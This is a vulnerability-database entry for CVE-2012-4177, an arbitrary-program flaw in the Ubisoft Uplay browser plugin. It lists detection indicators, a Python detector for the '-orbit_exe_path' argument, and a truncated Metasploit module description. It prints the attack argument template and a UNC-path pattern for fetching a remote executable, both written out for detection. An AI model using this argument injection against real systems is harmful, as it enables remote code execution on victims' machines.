CVE-2012-4177
Published: 2012-08-07
CVE-2012-4177: The web browser plugin for Ubisoft Uplay PC before 2.0.4 allows remote attackers to execute arbitrary programs via the -orbit_exe_path command line argument.
Priority: P274 · critical · 10 · CVSS 2.0
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS: 58.02% (99.0th percentile)
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ubi | uplay_pc | <= 2.0.3 | — |
| ubi | uplay_pc | — | — |
| ubi | uplay_pc | — | — |
| ubi | uplay_pc | — | — |
Detection & IOCs (extracted from sources)
Command: `-orbit_product_id 1 -orbit_exe_path <cmd> -uplay_steam_mode -uplay_dev_mode -uplay_dev_mode_auto_play`
- Detect ActiveX instantiation of the Ubisoft uplay ActiveX component (classid) within a browser context, particularly when the `open()` method is called with `-orbit_exe_path` in its argument string.
- The exploit targets only Windows XP SP3 (NT 5.1) user agents; filter for exploitation attempts scoped to this UA string.
- The exploit serves the malicious payload via WebDAV over port 80; monitor for WebDAV PROPFIND/OPTIONS requests on port 80 originating from browser processes, especially followed by UNC path access (`\\<host>\<share>\<random8>.exe`).
- Look for processes spawned by the uplay browser plugin with command-line arguments containing `-orbit_exe_path` pointing to a UNC path.
- The Metasploit module enforces SRVPORT=80 and URIPATH=/ and will fail otherwise; detections scoped to port 80 WebDAV are appropriate for this exploit as delivered.
- Exploitation requires the victim user to be signed into uplay (or have auto-sign-in enabled) and uplay must not already be running at the time of the attack.
- The exploit only engages Windows XP SP3 targets (NT 5.1 UA check); other OS versions will receive a 404 and not be exploited by this module.
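The process-creation check from the list above, sketched as an added example (not a rule from any of the indexed sources): it pulls the `-orbit_exe_path` value out of a command line and reports whether it points at a UNC path. The event field names and sample records are constructed, and the Base64 fallback rests on the assumption, not stated on this page, that the value may be passed encoded.

```python
import base64
import re

# Value that follows -orbit_exe_path: either a quoted string or a bare token.
ARG_RE = re.compile(r'-orbit_exe_path\s+(?:"([^"]*)"|(\S+))', re.IGNORECASE)

def exe_path_argument(cmdline):
    """Return the -orbit_exe_path value, or None if the switch is absent."""
    m = ARG_RE.search(cmdline)
    if not m:
        return None
    return m.group(1) if m.group(1) is not None else m.group(2)

def decoded_forms(value):
    """Raw value plus its Base64 decoding when that yields printable ASCII
    (assumption: the argument may arrive encoded)."""
    forms = [value]
    try:
        text = base64.b64decode(value, validate=True).decode("ascii")
        if text.isprintable():
            forms.append(text)
    except ValueError:  # covers binascii.Error and UnicodeDecodeError
        pass
    return forms

def is_unc(path):
    return path.startswith("\\\\") or path.startswith("//")

def triage(events):
    """Return (pid, verdict) for every event whose command line has the switch."""
    hits = []
    for ev in events:
        value = exe_path_argument(ev["cmdline"])
        if value is None:
            continue
        remote = any(is_unc(p) for p in decoded_forms(value))
        hits.append((ev["pid"], "unc-path" if remote else "local-path"))
    return hits

# Constructed process-creation records; names, pids and addresses are made up.
SAMPLE_EVENTS = [
    {"pid": 101, "cmdline": r'game.exe -orbit_product_id 1 -orbit_exe_path \\198.51.100.7\share\abcdefgh.exe -uplay_steam_mode'},
    {"pid": 102, "cmdline": r'game.exe -orbit_exe_path "C:\Games\Title\title.exe"'},
    {"pid": 103, "cmdline": "game.exe -orbit_exe_path " + base64.b64encode(rb"\\198.51.100.7\share\abcdefgh.exe").decode()},
    {"pid": 104, "cmdline": "notepad.exe readme.txt"},
]

if __name__ == "__main__":
    for pid, verdict in triage(SAMPLE_EVENTS):
        print(pid, verdict)
```

A `unc-path` verdict is the high-priority case; `local-path` hits are still worth reviewing when the parent process is a browser.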
No detection rules found.
Exploit-DB
Ubisoft uplay 2.0.3 - ActiveX Control Arbitrary Code Execution (Metasploit)
exploitdb·2012-08-08
---
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 'Ubisoft uplay 2.0.3 Active X Control Arbitrary Code Execution',
'Description' => %q{
The uplay ActiveX component allows an attacker to execute any command line action.
User must sign in, unless auto-sign in is enabled and uplay must not already be
running. Due to the way the malicious executable is served (WebDAV), the module
must be run on port 80, so please make sure you have enough privilege to do that.
Ubisoft released patch 2.04 as o
Metasploit
Ubisoft uplay 2.0.3 ActiveX Control Arbitrary Code Execution
metasploit
The uplay ActiveX component allows an attacker to execute any command line action. User must sign in, unless auto-sign in is enabled and uplay must not already be running. Due to the way the malicious executable is served (WebDAV), the module must be run on port 80, so please make sure you have enough privilege to do that. Ubisoft released patch 2.04 as of Mon 20th July.
No writeups or analysis indexed.
- http://forums.ubi.com/showthread.php/699940-Uplay-PC-Patch-2-0-4-Security-fix
- http://osvdb.org/84402
- http://seclists.org/fulldisclosure/2012/Jul/375
- http://www.bbc.com/news/technology-19053453
- http://www.exploit-db.com/exploits/20321
Published: 2012-08-07